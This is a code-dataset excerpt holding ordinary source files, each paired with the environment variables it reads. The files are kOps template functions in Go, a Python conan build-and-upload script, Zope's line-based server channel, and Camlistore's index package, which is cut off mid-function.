ServerCertificatePath: path.Join(pkiDir, "kops-controller.crt"),
ServerKeyPath: path.Join(pkiDir, "kops-controller.key"),
CABasePath: pkiDir,
SigningCAs: signingCAs,
CertNames: certNames,
}
switch kops.CloudProviderID(cluster.Spec.CloudProvider) {
case kops.CloudProviderAWS:
nodesRoles := sets.String{}
for _, ig := range tf.InstanceGroups {
if ig.Spec.Role == kops.InstanceGroupRoleNode || ig.Spec.Role == kops.InstanceGroupRoleAPIServer {
profile, err := tf.LinkToIAMInstanceProfile(ig)
if err != nil {
return "", fmt.Errorf("getting profile for ig %s: %v", ig.Name, err)
}
// The IAM Instance Profile has not been created at this point if it is not specified.
// Because the IAM Instance Profile and the IAM Role are created in IAMModelBuilder tasks.
// Therefore, the IAM Role associated with IAM Instance Profile is acquired only when it is not specified.
if ig.Spec.IAM != nil && ig.Spec.IAM.Profile != nil {
c := tf.cloud.(awsup.AWSCloud)
roles, err := awsup.GetRolesInInstanceProfile(c, *profile.Name)
if err != nil {
return "", fmt.Errorf("getting role from profile %s: %v", *profile.Name, err)
}
nodesRoles.Insert(roles...)
} else {
// When the IAM Instance Profile is not specified, IAM Instance Profile is created by kOps.
// In this case, the IAM Instance Profile name and IAM Role name are same.
// So there is no problem even if IAM Instance Profile name is inserted as role name in nodesRoles.
nodesRoles.Insert(*profile.Name)
}
}
}
config.Server.Provider.AWS = &awsup.AWSVerifierOptions{
NodesRoles: nodesRoles.List(),
Region: tf.Region,
}
default:
return "", fmt.Errorf("unsupported cloud provider %s", cluster.Spec.CloudProvider)
}
}
if tf.Cluster.Spec.PodCIDRFromCloud {
config.EnableCloudIPAM = true
}
// To avoid indentation problems, we marshal as json. json is a subset of yaml
b, err := json.Marshal(config)
if err != nil {
return "", fmt.Errorf("failed to serialize kops-controller config: %v", err)
}
return string(b), nil
}
// KopsControllerArgv returns the args to kops-controller
func (tf *TemplateFunctions) KopsControllerArgv() ([]string, error) {
var argv []string
argv = append(argv, "/kops-controller")
// Verbose, but not excessive logging
argv = append(argv, "--v=2")
argv = append(argv, "--conf=/etc/kubernetes/kops-controller/config/config.yaml")
return argv, nil
}
func (tf *TemplateFunctions) ExternalDNSArgv() ([]string, error) {
cluster := tf.Cluster
externalDNS := tf.Cluster.Spec.ExternalDNS
var argv []string
cloudProvider := cluster.Spec.CloudProvider
switch kops.CloudProviderID(cloudProvider) {
case kops.CloudProviderAWS:
argv = append(argv, "--provider=aws")
case kops.CloudProviderGCE:
project := cluster.Spec.Project
argv = append(argv, "--provider=google")
argv = append(argv, "--google-project="+project)
default:
return nil, fmt.Errorf("unhandled cloudprovider %q", cluster.Spec.CloudProvider)
}
argv = append(argv, "--events")
if fi.BoolValue(externalDNS.WatchIngress) {
argv = append(argv, "--source=ingress")
}
argv = append(argv, "--source=pod")
argv = append(argv, "--source=service")
argv = append(argv, "--compatibility=kops-dns-controller")
argv = append(argv, "--registry=txt")
argv = append(argv, "--txt-owner-id=kops-"+tf.ClusterName())
argv = append(argv, "--zone-id-filter="+tf.Cluster.Spec.DNSZone)
if externalDNS.WatchNamespace != "" {
argv = append(argv, "--namespace="+externalDNS.WatchNamespace)
}
return argv, nil
}
func (tf *TemplateFunctions) ProxyEnv() map[string]string {
cluster := tf.Cluster
envs := map[string]string{}
proxies := cluster.Spec.EgressProxy
if proxies == nil {
return envs
}
httpProxy := proxies.HTTPProxy
if httpProxy.Host != "" {
var portSuffix string
if httpProxy.Port != 0 {
portSuffix = ":" + strconv.Itoa(httpProxy.Port)
} else {
portSuffix = ""
}
url := "http://" + httpProxy.Host + portSuffix
envs["http_proxy"] = url
envs["https_proxy"] = url
}
if proxies.ProxyExcludes != "" {
envs["no_proxy"] = proxies.ProxyExcludes
envs["NO_PROXY"] = proxies.ProxyExcludes
}
return envs
}
// KopsSystemEnv builds the env vars for a system component
func (tf *TemplateFunctions) KopsSystemEnv() []corev1.EnvVar {
envMap := env.BuildSystemComponentEnvVars(&tf.Cluster.Spec)
return envMap.ToEnvVars()
}
// OpenStackCCM returns OpenStack external cloud controller manager current image
// with tag specified to k8s version
func (tf *TemplateFunctions) OpenStackCCMTag() string {
var tag string
parsed, err := util.ParseKubernetesVersion(tf.Cluster.Spec.KubernetesVersion)
if err != nil {
tag = "latest"
} else {
if parsed.Minor == 13 {
// The bugfix release
tag = "1.13.1"
} else {
// otherwise we use always .0 ccm image, if needed that can be overrided using clusterspec
tag = fmt.Sprintf("v%d.%d.0", parsed.Major, parsed.Minor)
}
}
return tag
}
// GetNodeInstanceGroups returns a map containing the defined instance groups of role "Node".
func (tf *TemplateFunctions) GetNodeInstanceGroups() map[string]kops.InstanceGroupSpec {
nodegroups := make(map[string]kops.InstanceGroupSpec)
for _, ig := range tf.KopsModelContext.InstanceGroups {
if ig.Spec.Role == kops.InstanceGroupRoleNode {
nodegroups[ig.ObjectMeta.Name] = ig.Spec
}
}
return nodegroups
}
|
[
"\"DIGITALOCEAN_ACCESS_TOKEN\"",
"\"AWS_REGION\""
] |
[] |
[
"DIGITALOCEAN_ACCESS_TOKEN",
"AWS_REGION"
] |
[]
|
["DIGITALOCEAN_ACCESS_TOKEN", "AWS_REGION"]
|
go
| 2 | 0 | |
build_and_upload.py
|
import os
import ntpath
import pathlib
import json
import re
import platform
import subprocess
import tempfile
import time
import colorama
from colorama import Fore, Back, Style
def wintolin(path):
path = os.path.abspath(path)
if path[1:2] == ':':
drive = path[:1].lower()
return '/mnt/' + drive + path[2:].replace('\\', '/')
def delete_folder(pth) :
if not os.path.exists(pth):
return
for sub in pth.iterdir() :
if sub.is_dir() :
delete_folder(sub)
else :
sub.chmod(0o666)
sub.unlink()
pth.rmdir()
def run_command(source_command, target_system = None, check = False):
if not target_system:
target_system = platform.system()
isWsl = False
if target_system == 'Windows':
if platform.system() != 'Windows':
raise Exception("Building Windows packages on non-Windows system is not supported")
command = source_command
elif target_system == 'Linux':
if platform.system() == 'Linux':
command = source_command
elif platform.system() == 'Windows':
is32bit = platform.architecture()[0] == '32bit'
system32 = os.path.join(os.environ['SystemRoot'], 'SysNative' if is32bit else 'System32')
bash = os.path.join(system32, 'bash.exe')
command = '{} -c "{} > \'{}\'"'.format(bash, source_command, '{}')
isWsl = True
else:
raise Exception("Unknown host system: {}".format(platform.system()))
else:
raise Exception("Unknown target system: {}".format(config['os']))
if not isWsl:
print(Fore.YELLOW + "Executing: {}".format(command))
subprocess.check_output(command)
else:
with tempfile.NamedTemporaryFile(mode='r', encoding='utf-8') as f:
command = command.format(wintolin(f.name))
print("Executing: {}".format(command))
child = subprocess.Popen(command)
while 1:
where = f.tell()
line = f.readline()
if not line:
return_code = child.poll()
if return_code is not None:
if check and return_code != 0:
raise Exception("Command return {} exit status.".format(return_code))
return return_code
time.sleep(1)
f.seek(where)
else:
print(line.rstrip())
def get_change_default_gcc(version):
if run_command('command -v gcc-{0} && command -v g++-{0}'.format(version), target_system='Linux') == 0:
return 'export CC="$(which gcc-{0})" && export CXX="$(which g++-{0})" && '.format(version)
return ''
def load_configs(obj):
configs = []
for configObj in obj:
if not configObj['id'] or not configObj['args']:
raise Exception("No id or config field was found")
if configObj['args']['os']:
target_os = configObj['args']['os']
else:
target_os = platform.system()
configs.append({ 'id': configObj['id'], 'os': target_os, 'args': configObj['args'] })
return configs
def install_repo(package):
match = re.search(':\/\/.+?\/.+?\/(.+)', package['url'])
repo_path = os.path.join(os.getcwd(), match.group(1))
delete_folder(pathlib.Path(repo_path))
run_command('git clone --recurse-submodules {}'.format(package['url']))
return repo_path
def get_package_conan_info(package_path):
with open(os.path.join(package_path, 'conanfile.py')) as f:
file_data = f.read()
result = {}
match = re.search(r'name\s*=\s*"([a-zA-z0-9-.]+)"', file_data)
result['name'] = match.group(1)
match = re.search(r'version\s*=\s*"([a-zA-Z0-9-.]+)"', file_data)
result['version'] = match.group(1)
return result
def get_package_build_data(repo_path, package, primary_name, build_configs):
build_data = get_package_conan_info(repo_path)
build_data['thread'] = package['thread']
secondary_name = package['secondary'] if 'secondary' in package else None
build_data['primary'] = primary_name
build_data['secondary'] = secondary_name
build_data['owner'] = secondary_name if secondary_name else primary_name
build_data['configs'] = [c for c in build_configs if c['id'] in package['configs']]\
if 'configs' in package else build_configs
return build_data
def create_package(build_data):
name = build_data['name']
owner = build_data['owner']
thread = build_data['thread']
for config in build_data['configs']:
params = ['-s {}=\"{}\"'.format(s, v) for (s, v) in config['args'].items()]
conan_command = ' '.join(
['conan', 'create', '.', '{}/{}'.format(owner, thread), *params, '--build=' + name, '--build=missing'])
if 'compiler.version' in config['args'] and config['os'] == 'Linux':
conan_command = get_change_default_gcc(config['args']['compiler.version']) + conan_command
run_command(conan_command, config['os'])
def upload_package(build_data):
command = 'conan upload {}/{}@{}/{} -r {} --all'\
.format(build_data['name'], build_data['version'], build_data['owner'], build_data['thread'], '{}' )
for build_os in ['Windows', 'Linux']:
if build_data['secondary']:
run_command(command.format(build_data['secondary']), build_os)
run_command(command.format(build_data['primary']), build_os)
if __name__ == '__main__':
colorama.init(autoreset=True)
with open('packages,json') as f:
config = json.load(f)
primary_name = config["primary"]
build_configs = load_configs(config['configs'])
if not primary_name:
raise Exception("Primary remote is required")
for package in config['packages']:
print(Fore.CYAN + "-------------------------Building package {}...".format(package['url']))
repo_path = install_repo(package)
build_data = get_package_build_data(repo_path, package, primary_name, build_configs)
print(Fore.CYAN + "Package info: {}".format(build_data))
old_dir = os.getcwd()
try:
os.chdir(repo_path)
create_package(build_data)
finally:
os.chdir(old_dir)
upload_package(build_data)
print(Fore.GREEN + "-------------------------Built package {}.".format(build_data['name']))
|
[] |
[] |
[
"SystemRoot"
] |
[]
|
["SystemRoot"]
|
python
| 1 | 0 | |
src/zope/server/linereceiver/lineserverchannel.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Line receiver channel
This channels evaluates requests line by line. This is particular useful for
protocols that use a line-based command structure.
"""
from asyncore import compact_traceback
import os
import sys
from zope.server.serverchannelbase import ServerChannelBase
from zope.server.linereceiver.linecommandparser import LineCommandParser
from zope.server.linereceiver.linetask import LineTask
DEBUG = os.environ.get('ZOPE_SERVER_DEBUG')
class LineServerChannel(ServerChannelBase):
"""The Line Server Channel represents a connection to a particular
client. We can therefore store information here."""
# Wrapper class that is used to execute a command in a different thread
task_class = LineTask
# Class that is being initialized to parse the input
parser_class = LineCommandParser
# List of commands that are always available
special_commands = ('cmd_quit',)
# Commands that are run in a separate thread
thread_commands = ()
# Define the authentication status of the channel. Note that only the
# "special commands" can be executed without having authenticated.
authenticated = 0
# Define the reply code for non-authenticated responses
not_auth_reply = 'LOGIN_REQUIRED'
# Define the reply code for an unrecognized command
unknown_reply = 'CMD_UNKNOWN'
# Define the error message that occurs, when the reply code was not found.
reply_error = '500 Unknown Reply Code: %s.'
# Define the status messages
status_messages = {
'CMD_UNKNOWN': "500 '%s': command not understood.",
'INTERNAL_ERROR': "500 Internal error: %s",
'LOGIN_REQUIRED': '530 Please log in with USER and PASS',
}
def handle_request(self, command):
"""Process a command.
Some commands use an alternate thread.
"""
assert isinstance(command, LineCommandParser)
cmd = command.cmd
method = 'cmd_' + cmd.lower()
if not self.authenticated and method not in self.special_commands:
# The user is not logged in, therefore don't allow anything
self.reply(self.not_auth_reply)
elif method in self.thread_commands:
# Process in another thread.
task = self.task_class(self, command, method)
self.queue_task(task)
elif hasattr(self, method):
try:
getattr(self, method)(command.args)
except: # noqa: E722 do not use bare 'except'
self.exception()
else:
self.reply(self.unknown_reply, cmd.upper())
def reply(self, code, args=(), flush=1):
""" """
try:
msg = self.status_messages[code] % args
except: # noqa: E722 do not use bare 'except'
msg = self.reply_error % code
self.write(msg.encode('utf-8') + b'\r\n')
if flush:
self.flush(0)
# TODO: Some logging should go on here.
def handle_error_no_close(self):
"""See asyncore.dispatcher.handle_error()"""
_nil, t, v, tbinfo = compact_traceback()
# sometimes a user repr method will crash.
try:
self_repr = repr(self)
except: # noqa: E722 do not use bare 'except'
self_repr = '<__repr__(self) failed for object at %0x>' % id(self)
self.log_info(
'uncaptured python exception, closing channel %s (%s:%s %s)' % (
self_repr,
t,
v,
tbinfo
),
'error'
)
def exception(self):
if DEBUG: # pragma: no cover
import traceback
traceback.print_exc()
t, v = sys.exc_info()[:2]
try:
info = '%s: %s' % (getattr(t, '__name__', t), v)
except: # noqa: E722 do not use bare 'except'
info = str(t)
self.reply('INTERNAL_ERROR', info)
self.handle_error_no_close()
self.close_when_done()
|
[] |
[] |
[
"ZOPE_SERVER_DEBUG"
] |
[]
|
["ZOPE_SERVER_DEBUG"]
|
python
| 1 | 0 | |
pkg/index/index.go
|
/*
Copyright 2011 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package index
import (
"bytes"
"errors"
"fmt"
"io"
"log"
"os"
"sort"
"strconv"
"strings"
"sync"
"time"
"camlistore.org/pkg/blob"
"camlistore.org/pkg/blobserver"
"camlistore.org/pkg/context"
"camlistore.org/pkg/env"
"camlistore.org/pkg/jsonconfig"
"camlistore.org/pkg/schema"
"camlistore.org/pkg/sorted"
"camlistore.org/pkg/strutil"
"camlistore.org/pkg/types"
"camlistore.org/pkg/types/camtypes"
)
func init() {
blobserver.RegisterStorageConstructor("index", newFromConfig)
}
type Index struct {
*blobserver.NoImplStorage
s sorted.KeyValue
KeyFetcher blob.Fetcher // for verifying claims
// TODO(mpl): do not init and use deletes when we have a corpus. Since corpus has its own deletes now, they are redundant.
// deletes is a cache to keep track of the deletion status (deleted vs undeleted)
// of the blobs in the index. It makes for faster reads than the otherwise
// recursive calls on the index.
deletes *deletionCache
corpus *Corpus // or nil, if not being kept in memory
mu sync.RWMutex // guards following
// needs maps from a blob to the missing blobs it needs to
// finish indexing.
needs map[blob.Ref][]blob.Ref
// neededBy is the inverse of needs. The keys are missing blobs
// and the value(s) are blobs waiting to be reindexed.
neededBy map[blob.Ref][]blob.Ref
readyReindex map[blob.Ref]bool // set of things ready to be re-indexed
oooRunning bool // whether outOfOrderIndexerLoop is running.
// blobSource is used for fetching blobs when indexing files and other
// blobs types that reference other objects.
// The only write access to blobSource should be its initialization (transition
// from nil to non-nil), once, and protected by mu.
blobSource blobserver.FetcherEnumerator
tickleOoo chan bool // tickle out-of-order reindex loop, whenever readyReindex is added to
}
var (
_ blobserver.Storage = (*Index)(nil)
_ Interface = (*Index)(nil)
)
var aboutToReindex = false
// SetImpendingReindex notes that the user ran the camlistored binary with the --reindex flag.
// Because the index is about to be wiped, schema version checks should be suppressed.
func SetImpendingReindex() {
// TODO: remove this function, once we refactor how indexes are created.
// They'll probably not all have their own storage constructor registered.
aboutToReindex = true
}
// MustNew is wraps New and fails with a Fatal error on t if New
// returns an error.
func MustNew(t types.TB, s sorted.KeyValue) *Index {
ix, err := New(s)
if err != nil {
t.Fatalf("Error creating index: %v", err)
}
return ix
}
// InitBlobSource sets the index's blob source and starts the background
// out-of-order indexing loop. It panics if the blobSource is already set.
// If the index's key fetcher is nil, it is also set to the blobSource
// argument.
func (x *Index) InitBlobSource(blobSource blobserver.FetcherEnumerator) {
x.mu.Lock()
defer x.mu.Unlock()
if x.blobSource != nil {
panic("blobSource of Index already set")
}
x.blobSource = blobSource
if x.oooRunning {
panic("outOfOrderIndexerLoop should never have previously started without a blobSource")
}
if x.KeyFetcher == nil {
x.KeyFetcher = blobSource
}
if disableOoo, _ := strconv.ParseBool(os.Getenv("CAMLI_TESTREINDEX_DISABLE_OOO")); disableOoo {
// For Reindex test in pkg/index/indextest/tests.go
return
}
go x.outOfOrderIndexerLoop()
}
// New returns a new index using the provided key/value storage implementation.
func New(s sorted.KeyValue) (*Index, error) {
idx := &Index{
s: s,
needs: make(map[blob.Ref][]blob.Ref),
neededBy: make(map[blob.Ref][]blob.Ref),
readyReindex: make(map[blob.Ref]bool),
tickleOoo: make(chan bool, 1),
}
if aboutToReindex {
idx.deletes = newDeletionCache()
return idx, nil
}
schemaVersion := idx.schemaVersion()
switch {
case schemaVersion == 0 && idx.isEmpty():
// New index.
err := idx.s.Set(keySchemaVersion.name, fmt.Sprint(requiredSchemaVersion))
if err != nil {
return nil, fmt.Errorf("Could not write index schema version %q: %v", requiredSchemaVersion, err)
}
case schemaVersion != requiredSchemaVersion:
tip := ""
if env.IsDev() {
// Good signal that we're using the devcam server, so help out
// the user with a more useful tip:
tip = `(For the dev server, run "devcam server --wipe" to wipe both your blobs and index)`
} else {
if is4To5SchemaBump(schemaVersion) {
return idx, errMissingWholeRef
}
tip = "Run 'camlistored --reindex' (it might take awhile, but shows status). Alternative: 'camtool dbinit' (or just delete the file for a file based index), and then 'camtool sync --all'"
}
return nil, fmt.Errorf("index schema version is %d; required one is %d. You need to reindex. %s",
schemaVersion, requiredSchemaVersion, tip)
}
if err := idx.initDeletesCache(); err != nil {
return nil, fmt.Errorf("Could not initialize index's deletes cache: %v", err)
}
if err := idx.initNeededMaps(); err != nil {
return nil, fmt.Errorf("Could not initialize index's missing blob maps: %v", err)
}
return idx, nil
}
func is4To5SchemaBump(schemaVersion int) bool {
return schemaVersion == 4 && requiredSchemaVersion == 5
}
var errMissingWholeRef = errors.New("missing wholeRef field in fileInfo rows")
// fixMissingWholeRef appends the wholeRef to all the keyFileInfo rows values. It should
// only be called to upgrade a version 4 index schema to version 5.
func (x *Index) fixMissingWholeRef(fetcher blob.Fetcher) (err error) {
// We did that check from the caller, but double-check again to prevent from misuse
// of that function.
if x.schemaVersion() != 4 || requiredSchemaVersion != 5 {
panic("fixMissingWholeRef should only be used when upgrading from v4 to v5 of the index schema")
}
log.Println("index: fixing the missing wholeRef in the fileInfo rows...")
defer func() {
if err != nil {
log.Printf("index: fixing the fileInfo rows failed: %v", err)
return
}
log.Print("index: successfully fixed wholeRef in FileInfo rows.")
}()
// first build a reverted keyWholeToFileRef map, so we can get the wholeRef from the fileRef easily.
fileRefToWholeRef := make(map[blob.Ref]blob.Ref)
it := x.queryPrefix(keyWholeToFileRef)
var keyA [3]string
for it.Next() {
keyPart := strutil.AppendSplitN(keyA[:0], it.Key(), "|", 3)
if len(keyPart) != 3 {
return fmt.Errorf("bogus keyWholeToFileRef key: got %q, wanted \"wholetofile|wholeRef|fileRef\"", it.Key())
}
wholeRef, ok1 := blob.Parse(keyPart[1])
fileRef, ok2 := blob.Parse(keyPart[2])
if !ok1 || !ok2 {
return fmt.Errorf("bogus part in keyWholeToFileRef key: %q", it.Key())
}
fileRefToWholeRef[fileRef] = wholeRef
}
if err := it.Close(); err != nil {
return err
}
// We record the mutations and set them all after the iteration because of the sqlite locking:
// since BeginBatch takes a lock, and Find too, we would deadlock at queryPrefix if we
// started a batch mutation before.
mutations := make(map[string]string)
keyPrefix := keyFileInfo.name + "|"
it = x.queryPrefix(keyFileInfo)
defer it.Close()
var valA [3]string
for it.Next() {
br, ok := blob.ParseBytes(it.KeyBytes()[len(keyPrefix):])
if !ok {
return fmt.Errorf("invalid blobRef %q", it.KeyBytes()[len(keyPrefix):])
}
wholeRef, ok := fileRefToWholeRef[br]
if !ok {
log.Printf("WARNING: wholeRef for %v not found in index. You should probably rebuild the whole index.", br)
continue
}
valPart := strutil.AppendSplitN(valA[:0], it.Value(), "|", 3)
// The old format we're fixing should be: size|filename|mimetype
if len(valPart) != 3 {
return fmt.Errorf("bogus keyFileInfo value: got %q, wanted \"size|filename|mimetype\"", it.Value())
}
size_s, filename, mimetype := valPart[0], valPart[1], urld(valPart[2])
if strings.Contains(mimetype, "|") {
// I think this can only happen for people migrating from a commit at least as recent as
// 8229c1985079681a652cb65551b4e80a10d135aa, when wholeRef was introduced to keyFileInfo
// but there was no migration code yet.
// For the "production" migrations between 0.8 and 0.9, the index should not have any wholeRef
// in the keyFileInfo entries. So if something goes wrong and is somehow linked to that happening,
// I'd like to know about it, hence the logging.
log.Printf("%v: %v already has a wholeRef, not fixing it", it.Key(), it.Value())
continue
}
size, err := strconv.Atoi(size_s)
if err != nil {
return fmt.Errorf("bogus size in keyFileInfo value %v: %v", it.Value(), err)
}
mutations[keyFileInfo.Key(br)] = keyFileInfo.Val(size, filename, mimetype, wholeRef)
}
if err := it.Close(); err != nil {
return err
}
bm := x.s.BeginBatch()
for k, v := range mutations {
bm.Set(k, v)
}
bm.Set(keySchemaVersion.name, "5")
if err := x.s.CommitBatch(bm); err != nil {
return err
}
return nil
}
func newFromConfig(ld blobserver.Loader, config jsonconfig.Obj) (blobserver.Storage, error) {
blobPrefix := config.RequiredString("blobSource")
kvConfig := config.RequiredObject("storage")
if err := config.Validate(); err != nil {
return nil, err
}
kv, err := sorted.NewKeyValue(kvConfig)
if err != nil {
return nil, err
}
sto, err := ld.GetStorage(blobPrefix)
if err != nil {
return nil, err
}
ix, err := New(kv)
// TODO(mpl): next time we need to do another fix, make a new error
// type that lets us apply the needed fix depending on its value or
// something. For now just one value/fix.
if err == errMissingWholeRef {
// TODO: maybe we don't want to do that automatically. Brad says
// we have to think about the case on GCE/CoreOS in particular.
if err := ix.fixMissingWholeRef(sto); err != nil {
ix.Close()
return nil, fmt.Errorf("could not fix missing wholeRef entries: %v", err)
}
ix, err = New(kv)
}
if err != nil {
return nil, err
}
ix.InitBlobSource(sto)
return ix, err
}
func (x *Index) String() string {
return fmt.Sprintf("Camlistore index, using key/value implementation %T", x.s)
}
func (x *Index) isEmpty() bool {
iter := x.s.Find("", "")
hasRows := iter.Next()
if err := iter.Close(); err != nil {
panic(err)
}
return !hasRows
}
// reindexMaxProcs is the number of concurrent goroutines that will be used for reindexing.
var reindexMaxProcs = struct {
sync.RWMutex
v int
}{v: 4}
// SetReindexMaxProcs sets the maximum number of concurrent goroutines that are
// used during reindexing.
func SetReindexMaxProcs(n int) {
reindexMaxProcs.Lock()
defer reindexMaxProcs.Unlock()
reindexMaxProcs.v = n
}
// ReindexMaxProcs returns the maximum number of concurrent goroutines that are
// used during reindexing.
func ReindexMaxProcs() int {
reindexMaxProcs.RLock()
defer reindexMaxProcs.RUnlock()
return reindexMaxProcs.v
}
func (x *Index) Reindex() error {
reindexMaxProcs.RLock()
defer reindexMaxProcs.RUnlock()
ctx := context.TODO()
wiper, ok := x.s.(sorted.Wiper)
if !ok {
return fmt.Errorf("index's storage type %T doesn't support sorted.Wiper", x.s)
}
log.Printf("Wiping index storage type %T ...", x.s)
if err := wiper.Wipe(); err != nil {
return fmt.Errorf("error wiping index's sorted key/value type %T: %v", x.s, err)
}
log.Printf("Index wiped. Rebuilding...")
reindexStart, _ := blob.Parse(os.Getenv("CAMLI_REINDEX_START"))
err := x.s.Set(keySchemaVersion.name, fmt.Sprintf("%d", requiredSchemaVersion))
if err != nil {
return err
}
var nerrmu sync.Mutex
nerr := 0
blobc := make(chan blob.Ref, 32)
enumCtx := ctx.New()
enumErr := make(chan error, 1)
go func() {
defer close(blobc)
donec := enumCtx.Done()
var lastTick time.Time
enumErr <- blobserver.EnumerateAll(enumCtx, x.blobSource, func(sb blob.SizedRef) error {
now := time.Now()
if lastTick.Before(now.Add(-1 * time.Second)) {
log.Printf("Reindexing at %v", sb.Ref)
lastTick = now
}
if reindexStart.Valid() && sb.Ref.Less(reindexStart) {
return nil
}
select {
case <-donec:
return context.ErrCanceled
case blobc <- sb.Ref:
return nil
}
})
}()
var wg sync.WaitGroup
for i := 0; i < reindexMaxProcs.v; i++ {
wg.Add(1)
go func() {
defer wg.Done()
for br := range blobc {
if err := x.indexBlob(br); err != nil {
log.Printf("Error reindexing %v: %v", br, err)
nerrmu.Lock()
nerr++
nerrmu.Unlock()
// TODO: flag (or default?) to stop the EnumerateAll above once
// there's any error with reindexing?
}
}
}()
}
if err := <-enumErr; err != nil {
return err
}
wg.Wait()
x.mu.Lock()
readyCount := len(x.readyReindex)
x.mu.Unlock()
if readyCount > 0 {
return fmt.Errorf("%d blobs were ready to reindex in out-of-order queue, but not yet ran", readyCount)
}
log.Printf("Index rebuild complete.")
nerrmu.Lock() // no need to unlock
if nerr != 0 {
return fmt.Errorf("%d blobs failed to re-index", nerr)
}
if err := x.initDeletesCache(); err != nil {
return err
}
return nil
}
func queryPrefixString(s sorted.KeyValue, prefix string) sorted.Iterator {
if prefix == "" {
return s.Find("", "")
}
lastByte := prefix[len(prefix)-1]
if lastByte == 0xff {
panic("unsupported query prefix ending in 0xff")
}
end := prefix[:len(prefix)-1] + string(lastByte+1)
return s.Find(prefix, end)
}
func (x *Index) queryPrefixString(prefix string) sorted.Iterator {
return queryPrefixString(x.s, prefix)
}
func queryPrefix(s sorted.KeyValue, key *keyType, args ...interface{}) sorted.Iterator {
return queryPrefixString(s, key.Prefix(args...))
}
func (x *Index) queryPrefix(key *keyType, args ...interface{}) sorted.Iterator {
return x.queryPrefixString(key.Prefix(args...))
}
func closeIterator(it sorted.Iterator, perr *error) {
err := it.Close()
if err != nil && *perr == nil {
*perr = err
}
}
// schemaVersion returns the version of schema as it is found
// in the currently used index. If not found, it returns 0.
func (x *Index) schemaVersion() int {
schemaVersionStr, err := x.s.Get(keySchemaVersion.name)
if err != nil {
if err == sorted.ErrNotFound {
return 0
}
panic(fmt.Sprintf("Could not get index schema version: %v", err))
}
schemaVersion, err := strconv.Atoi(schemaVersionStr)
if err != nil {
panic(fmt.Sprintf("Bogus index schema version: %q", schemaVersionStr))
}
return schemaVersion
}
type deletion struct {
deleter blob.Ref
when time.Time
}
type byDeletionDate []deletion
func (d byDeletionDate) Len() int { return len(d) }
func (d byDeletionDate) Swap(i, j int) { d[i], d[j] = d[j], d[i] }
func (d byDeletionDate) Less(i, j int) bool { return d[i].when.Before(d[j].when) }
type deletionCache struct {
sync.RWMutex
m map[blob.Ref][]deletion
}
func newDeletionCache() *deletionCache {
return &deletionCache{
m: make(map[blob.Ref][]deletion),
}
}
// initDeletesCache creates and populates the deletion status cache used by the index
// for faster calls to IsDeleted and DeletedAt. It is called by New.
func (x *Index) initDeletesCache() (err error) {
x.deletes = newDeletionCache()
it := x.queryPrefix(keyDeleted)
defer closeIterator(it, &err)
for it.Next() {
cl, ok := kvDeleted(it.Key())
if !ok {
return fmt.Errorf("Bogus keyDeleted entry key: want |\"deleted\"|<deleted blobref>|<reverse claimdate>|<deleter claim>|, got %q", it.Key())
}
targetDeletions := append(x.deletes.m[cl.Target],
deletion{
deleter: cl.BlobRef,
when: cl.Date,
})
sort.Sort(sort.Reverse(byDeletionDate(targetDeletions)))
x.deletes.m[cl.Target] = targetDeletions
}
return err
}
func kvDeleted(k string) (c camtypes.Claim, ok bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
if len(keyPart) != 4 {
return
}
if keyPart[0] != "deleted" {
return
}
target, ok := blob.Parse(keyPart[1])
if !ok {
return
}
claimRef, ok := blob.Parse(keyPart[3])
if !ok {
return
}
date, err := time.Parse(time.RFC3339, unreverseTimeString(keyPart[2]))
if err != nil {
return
}
return camtypes.Claim{
BlobRef: claimRef,
Target: target,
Date: date,
Type: string(schema.DeleteClaim),
}, true
}
// IsDeleted reports whether the provided blobref (of a permanode or
// claim) should be considered deleted.
func (x *Index) IsDeleted(br blob.Ref) bool {
if x.deletes == nil {
// We still allow the slow path, in case someone creates
// their own Index without a deletes cache.
return x.isDeletedNoCache(br)
}
x.deletes.RLock()
defer x.deletes.RUnlock()
return x.isDeleted(br)
}
// The caller must hold x.deletes.mu for read.
func (x *Index) isDeleted(br blob.Ref) bool {
deletes, ok := x.deletes.m[br]
if !ok {
return false
}
for _, v := range deletes {
if !x.isDeleted(v.deleter) {
return true
}
}
return false
}
// Used when the Index has no deletes cache (x.deletes is nil).
func (x *Index) isDeletedNoCache(br blob.Ref) bool {
var err error
it := x.queryPrefix(keyDeleted, br)
for it.Next() {
cl, ok := kvDeleted(it.Key())
if !ok {
panic(fmt.Sprintf("Bogus keyDeleted entry key: want |\"deleted\"|<deleted blobref>|<reverse claimdate>|<deleter claim>|, got %q", it.Key()))
}
if !x.isDeletedNoCache(cl.BlobRef) {
closeIterator(it, &err)
if err != nil {
// TODO: Do better?
panic(fmt.Sprintf("Could not close iterator on keyDeleted: %v", err))
}
return true
}
}
closeIterator(it, &err)
if err != nil {
// TODO: Do better?
panic(fmt.Sprintf("Could not close iterator on keyDeleted: %v", err))
}
return false
}
// GetRecentPermanodes sends results to dest filtered by owner, limit, and
// before. A zero value for before will default to the current time. The
// results will have duplicates supressed, with most recent permanode
// returned.
// Note, permanodes more recent than before will still be fetched from the
// index then skipped. This means runtime scales linearly with the number of
// nodes more recent than before.
func (x *Index) GetRecentPermanodes(dest chan<- camtypes.RecentPermanode, owner blob.Ref, limit int, before time.Time) (err error) {
defer close(dest)
keyId, err := x.KeyId(owner)
if err == sorted.ErrNotFound {
log.Printf("No recent permanodes because keyId for owner %v not found", owner)
return nil
}
if err != nil {
log.Printf("Error fetching keyId for owner %v: %v", owner, err)
return err
}
sent := 0
var seenPermanode dupSkipper
if before.IsZero() {
before = time.Now()
}
// TODO(bradfitz): handle before efficiently. don't use queryPrefix.
